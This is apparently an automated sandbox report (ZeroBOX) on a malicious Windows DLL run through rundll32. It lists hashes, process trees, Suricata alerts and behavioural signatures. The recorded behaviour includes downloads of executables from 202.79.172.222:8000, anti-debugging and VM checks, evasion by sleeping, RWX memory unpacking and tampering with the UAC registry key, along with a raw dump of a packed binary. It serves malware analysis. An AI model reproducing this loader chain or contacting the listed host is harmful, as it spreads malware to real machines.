Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 11, 2023, 4:18 p.m.	Nov. 11, 2023, 4:20 p.m.

Size	73.5KB
Type	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	`cbb30cf779a03c4a42012fe3991a3ab3`
SHA256	`b41da50ebdce879341e77c809e5c458721326c5d7d6f53feb76b220f0b1e718b`
CRC32	`E08CEDBC`
ssdeep	`1536:awsdCFnE4Nz1/SXPtpoprAeDYxUfGJhK5O:awsAik1a4pGJhK5O`
Yara	Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) PE_Header_Zero - PE File Signature IsDLL - (no description)

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\j-10.dll,Edge
2560
- xBkkGuaG.exe "C:\Users\Public\Libraries\GMjHlXXkw\xBkkGuaG.exe"
  2772
  - cmd.exe cmd /c echo.>c:\xxxx.ini
    2888
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\j-10.dll,
2644

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
202.79.172.222	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 202.79.172.222:8000 -> 192.168.56.101:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 202.79.172.222:8000 -> 192.168.56.101:49164	2023711	ET MALWARE JS/WSF Downloader Dec 08 2016 M7	A Network Trojan was detected
TCP 202.79.172.222:8000 -> 192.168.56.101:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 202.79.172.222:8000 -> 192.168.56.101:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 202.79.172.222:8000 -> 192.168.56.101:49164	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 202.79.172.222:8000 -> 192.168.56.101:49164	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 11, 2023, 4:18 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 11, 2023, 4:18 p.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 11, 2023, 4:18 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.172.222:8000/1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.172.222:8000/2
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.172.222:8000/3
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.172.222:8000/4

Performs some HTTP requests (4 events)

request	GET http://202.79.172.222:8000/1
request	GET http://202.79.172.222:8000/2
request	GET http://202.79.172.222:8000/3
request	GET http://202.79.172.222:8000/4

Allocates read-write-execute memory (usually to unpack itself) (16 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bfe000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75e61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76161000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x764b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73660000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73571000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734a4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73572000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76281000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75bc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75d21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73572000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2772 region_size: 94208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

xBkkGuaG.exe tried to sleep 439 seconds, actually delayed analysis time by 439 seconds

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\Libraries\GMjHlXXkw\9Z8y.exe
file	C:\Users\Public\Libraries\GMjHlXXkw\xBkkGuaG.exe

Drops a binary and executes it (1 event)

file	C:\Users\Public\Libraries\GMjHlXXkw\xBkkGuaG.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 74 events)

Time & API	Arguments	Status	Return
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: smss.exe process_identifier: 224	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: csrss.exe process_identifier: 304	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: wininit.exe process_identifier: 352	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: csrss.exe process_identifier: 360	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: winlogon.exe process_identifier: 400	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: services.exe process_identifier: 444	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: lsm.exe process_identifier: 468	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 572	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 652	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 724	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 784	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 832	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: audiodg.exe process_identifier: 900	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 992	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 292	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: spoolsv.exe process_identifier: 324	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 1048	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: srvany.exe process_identifier: 1284	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: KMService.exe process_identifier: 1436	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: conhost.exe process_identifier: 1448	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: taskhost.exe process_identifier: 1600	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: sppsvc.exe process_identifier: 1820	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: svchost.exe process_identifier: 1896	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: dwm.exe process_identifier: 1260	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: explorer.exe process_identifier: 1452	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: pw.exe process_identifier: 988	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: SearchIndexer.exe process_identifier: 1160	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: SearchProtocolHost.exe process_identifier: 936	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: SearchFilterHost.exe process_identifier: 2000	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: mobsync.exe process_identifier: 2280	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: pw.exe process_identifier: 2324	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: taskhost.exe process_identifier: 2376	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000104 process_name: rundll32.exe process_identifier: 2560	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000280 process_name: xBkkGuaG.exe process_identifier: 2772	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000001f8 process_name: xBkkGuaG.exe process_identifier: 6619244		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000360 process_name: xBkkGuaG.exe process_identifier: 6815811		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000368 process_name: xBkkGuaG.exe process_identifier: 7340153		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000036c process_name: xBkkGuaG.exe process_identifier: 7274610		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000370 process_name: xBkkGuaG.exe process_identifier: 7602224		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000374 process_name: xBkkGuaG.exe process_identifier: 7536688		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000378 process_name: xBkkGuaG.exe process_identifier: 3014768		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000037c process_name: xBkkGuaG.exe process_identifier: 7274573		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000380 process_name: xBkkGuaG.exe process_identifier: 5046390		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000384 process_name: xBkkGuaG.exe process_identifier: 6815859		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000388 process_name: xBkkGuaG.exe process_identifier: 6881397		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000038c process_name: xBkkGuaG.exe process_identifier: 7602277		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000390 process_name: xBkkGuaG.exe process_identifier: 6619235		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000394 process_name: xBkkGuaG.exe process_identifier: 4456552		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000398 process_name: xBkkGuaG.exe process_identifier: 7536758		0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003a0 process_name: xBkkGuaG.exe process_identifier: 6684769		0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 155648 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process rundll32.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Nov. 11, 2023, 4:18 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTàà@P 0>` @@Ào$uÄ@$5pUPX0P àUPX1à` à@à.rsrc@@:ä@À3.91UPX! QµÙä½ª&ÞÀ&/ÿÿÿÿÁL$HÿHÇ4hNÂVñè/.öDï¾¿ý$tVASYÆ^6ÇIÃÿqûÿýÿt$PÂ¸lMT ß@ìmÿ·ÿMèÿSVW}9}eðuìsWûÿîßYEMÜÛMeüWÆEü¨ooíu4~üÿØ<BÿvÔÎSoßm1)]F¤ü;ßtý=¸µ6I4Yô_^d Z»öÿ÷Ð[ÉÂEäèHêàìw Ö¥¿7jjmSð_¸Ô4yùlí{Á3ÛLÔ]üTEñÀIáíwy^¡<ðQÐRÌÿ¾T§<í&S:ÐÐÀ^È¿»öûP/EÀzPj ô4ëGÀuiØvÌMCäxÿhdjÿQÏbîap/âøÇt8\|³ûIÊßN¦H9¼FFu-Áó0Çì£mù·Eè3ÛSSßýçé¹ :Rh/@+{ÿþàYÃö,u KFÃ>r¥û U_¹(Lhord@(ù±èr³`Äl<HFUìw<üTFh1¢ðYÞAÑöf¾¦{Å ¶Vfííÿ\Äë3özô3Àü¿0ýÿÏÈÀøÁá3ÒòÙ#÷#ß3óðãß¾æÒ3U^ÑâÑáÿMøuüa7Üâ@=tZ¬\|ÄÚC`ñáØ¯é;xÈ%uçÿ \$ðöYt!ÀFp/stàÛÿàvÀDøjÊ^öÁªÑé3ËØàoúBéNuÂBÇú9\|ÝÁ U6,Î(èQOÍñÑj8ðè>uçÎÓf8 d3;fÖÂÖkÈãÉ#@éÍ^U L¬pü¿ÙA\|ÐHÒt,Q@SWØý»à&\¶pçÿ¤3ûFÁè¯£3¼&<º3Ç®cuö[D^¦Óu«]XÈ¤Pvx-Út¢°PáBäFrÉ÷uí^ÃE°ï×b´W"3ÿLÊÃ9Æ VdÌÎÄðÚ¼ +ëº@¦Àtå7XÉ)ä³k©üMðT!T_ Á]éÃ¸À¸ kÓÁ½ãkú>+u,ÇF,äb\|·¦iZ8<40@D 4MÓHLPTX(íTÚÔ,¡Üâîò;÷8tzàÚµ[¾ ®Ð3\|LÎ´¦óàO`Hjë.-¶9F(^À²ü@mæ2ÃÁî¼89_üì^8tòZx;ûmÜ9_,o®´Û\|.Hu0Lu4÷¿ÖF´TJG4;Ã\|e+àÛt`Xt[P¶@Ïðnhí9W8(&Ppþuÿ?{»ÂT²ÿO4$(} è(\|Åjú Wwöaðsì1s{ÚÅ3Ö,MÌHtH @äÈð:@ÝOåvÕ,,ø\|Ê·Ü,ÿë§ð0^"¸Läu¦\.I00Ô00'Çä4;ÿ.oN³þÿÿªX¡ÈáÉèGeépSEèÑèÔñBhVWÝ·M+38N, 9FðhÂÁÿ9Xøu hÈóPç"Woø5ûSÖ¦ð-#ëqA£æa5EàPÒª}÷ð¢QãÕÿ5Èl½òNr&ìQ;ÿ0À-~^"ái`;çæîG¬}àaëÍN(F«¥'¶pF52À.t% ÙÒs0Ìüðõ¸XÆ6PrÊ>\|:uã_K¡~SÕÉ´ ¶¦\Q®Ã×v&ìäÀà¾pÉ~Si¡Àù';÷#Ä' 0j8Ý_Ñ~¯Èè;Ï}üt â-0Âðäâ8E»RÙ +OIÅ_´T9xøtbè¹Ê3ðNäë»<7åèWWSüh?é.i))ÁApmj #êºýø óªìë>9}Vþ_özÂuÓxN9{Pu~,¿"Ó0o8÷HàèÝF,H%4?GðÌÅ?q× ì$ÀÂtZÿ0\|à öì8pêÒQ¹þhbëaYßGá'Æz`w"üÍ°NÉtÎvpà¼ÂñÎVð3±S[ÅíVQW¢;Ç4VÐZâøJÄ¶md×+Ý_úþªvjèñ¾÷Ð¨t!oÔÂAµÙ.t<¢ `ªðP£½ãÅ¿ßëì;¶pHôSX® ±ClÎK íuç[Ä]ÅNQd@¤mä+Â¿«ö(Xôu/jFL+½üü¸ÀIIDô\|AVÐþÒöèIuòhjßÁûÀ"GãFíÿFG#[\|íð,6>QÿI6dAÎ·$ù4ÃmÎ6Qk0ÕD6ó$iëT lz\ô¯F4 X8ÿE c]`)ãÕÎrÛoÓ¬áL,&ãÆÈ£åDå'Ãg -8L+îÍIËYºBhø3Û .ÀïPüPSV5D`T+ñ_È]øÜ5`ÌÿÖ¯À¸XBÿh]ÛäaD=êzus9]^nPüÝ¡B?Lá;Ã@ôWÑíÚÝ²µFô°«à]`«IrÔ;ótõ¿Á]¸ÏFO8_8ÿwOðCÅëÓß+>´0ë S±8ãSà3ÀTþ7,f´øþt);Ft$ \|Ô¹Þ"(îh`0P[>=âxçþvÊ OøÿN£Îmjÿj-®e6$¤í`-×ñ2M(Vï.H$>ô7®v,êÿ7ÃÁà3íÖÐ (#Ç$C;VrÆñ¤Ô]ùg+8 @·ðX;\ »ÏßÛcøÁ`zÇ@(ÇÛ·Ý<j'Ilù\| èçöÍc%tatO~f<~;[nwéu\$ù Xù~ûìJÿ¾É¶\|3ÓÉ¾Oÿ+*ë&.Ðùú§½ãíëfëâ×Y®ù¿wò:étIuÀ7ÁÝ0ÇäïtM¸irE¯Ãð¸nSUe¤p³jÓU~ k~<ïØÄj Ü\$ ..Ç=öéè²0n]^h\|Ñî »©Sú,zÆFm¶mÕ\ ¶.^,_:`/~,l®LdP×PU±MÑì\^øS+Ë$Ë_¹$`(@_©FÒÆ@ j[¿¥¸^0ªÏ¸7nwäãJMò<è]p ßo×e(Výå©Hæ$RtÕ ëG¬ g¡3îÕh0¦+r_w@¢láH<µA¦À°jëèîNªÝ5û^M°{pÝBü¾U->ý)@îDïS]ÄèltWu=?V6] ÃR:[;¾ýÿtMè#t?jY+Át/tHHdHuÃ°ãgNG`Jf@û¾4]ÇF^ëuË«¼Ï ëi`:ÛkÏí_ëW<tH;/"u åý8EÛt b WyÿÉ&^ë((ÿyL±\F èÀíE}<[¦_ ÿÂA;þ]ÑVVC§uÝh¹r&á©£ request_handle: 0x00cc000c	1	1	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 498 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000280 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000280 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000002a8 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000002a8 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000354 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000354 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000001f8 process_name: xBkkGuaG.exe process_identifier: 6619244		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000360 process_name: xBkkGuaG.exe process_identifier: 6815811		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000368 process_name: xBkkGuaG.exe process_identifier: 7340153		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000036c process_name: xBkkGuaG.exe process_identifier: 7274610		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000370 process_name: xBkkGuaG.exe process_identifier: 7602224		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000374 process_name: xBkkGuaG.exe process_identifier: 7536688		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000378 process_name: xBkkGuaG.exe process_identifier: 3014768		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000037c process_name: xBkkGuaG.exe process_identifier: 7274573		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000380 process_name: xBkkGuaG.exe process_identifier: 5046390		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000384 process_name: xBkkGuaG.exe process_identifier: 6815859		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000388 process_name: xBkkGuaG.exe process_identifier: 6881397		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000038c process_name: xBkkGuaG.exe process_identifier: 7602277		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000390 process_name: xBkkGuaG.exe process_identifier: 6619235		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000394 process_name: xBkkGuaG.exe process_identifier: 4456552		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000398 process_name: xBkkGuaG.exe process_identifier: 7536758		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000039c process_name: xBkkGuaG.exe process_identifier: 7602277		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003a0 process_name: xBkkGuaG.exe process_identifier: 6684769		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003a4 process_name: xBkkGuaG.exe process_identifier: 7536752		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003a8 process_name: xBkkGuaG.exe process_identifier: 7602275		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003ac process_name: xBkkGuaG.exe process_identifier: 7536761		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003b0 process_name: xBkkGuaG.exe process_identifier: 4390992		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003b4 process_name: process_identifier: 5439572		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003b8 process_name: xBkkGuaG.exe process_identifier: 6553715		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003bc process_name: xBkkGuaG.exe process_identifier: 5046338		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003c0 process_name: xBkkGuaG.exe process_identifier: 6619246		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003c4 process_name: xBkkGuaG.exe process_identifier: 6750273		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003c8 process_name: xBkkGuaG.exe process_identifier: 7471220		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003cc process_name: xBkkGuaG.exe process_identifier: 7733331		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003d0 process_name: xBkkGuaG.exe process_identifier: 4980808		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003d4 process_name: xBkkGuaG.exe process_identifier: 6619251		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003d8 process_name: xBkkGuaG.exe process_identifier: 7340109		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003dc process_name: xBkkGuaG.exe process_identifier: 7864421		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003e0 process_name: xBkkGuaG.exe process_identifier: 3342387		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003e4 process_name: xBkkGuaG.exe process_identifier: 3014722		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003e8 process_name: process_identifier: 7733362		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003ec process_name: xBkkGuaG.exe process_identifier: 6553705		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003f8 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003f8 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003f4 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003f4 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003f4 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003f4 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003f4 process_name: xBkkGuaG.exe process_identifier: 2772		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000003f4 process_name: xBkkGuaG.exe process_identifier: 2772		0	0

Communicates with host for which no DNS query was performed (1 event)

host

202.79.172.222

Attempts to modify UAC prompt behavior (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

j-10

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All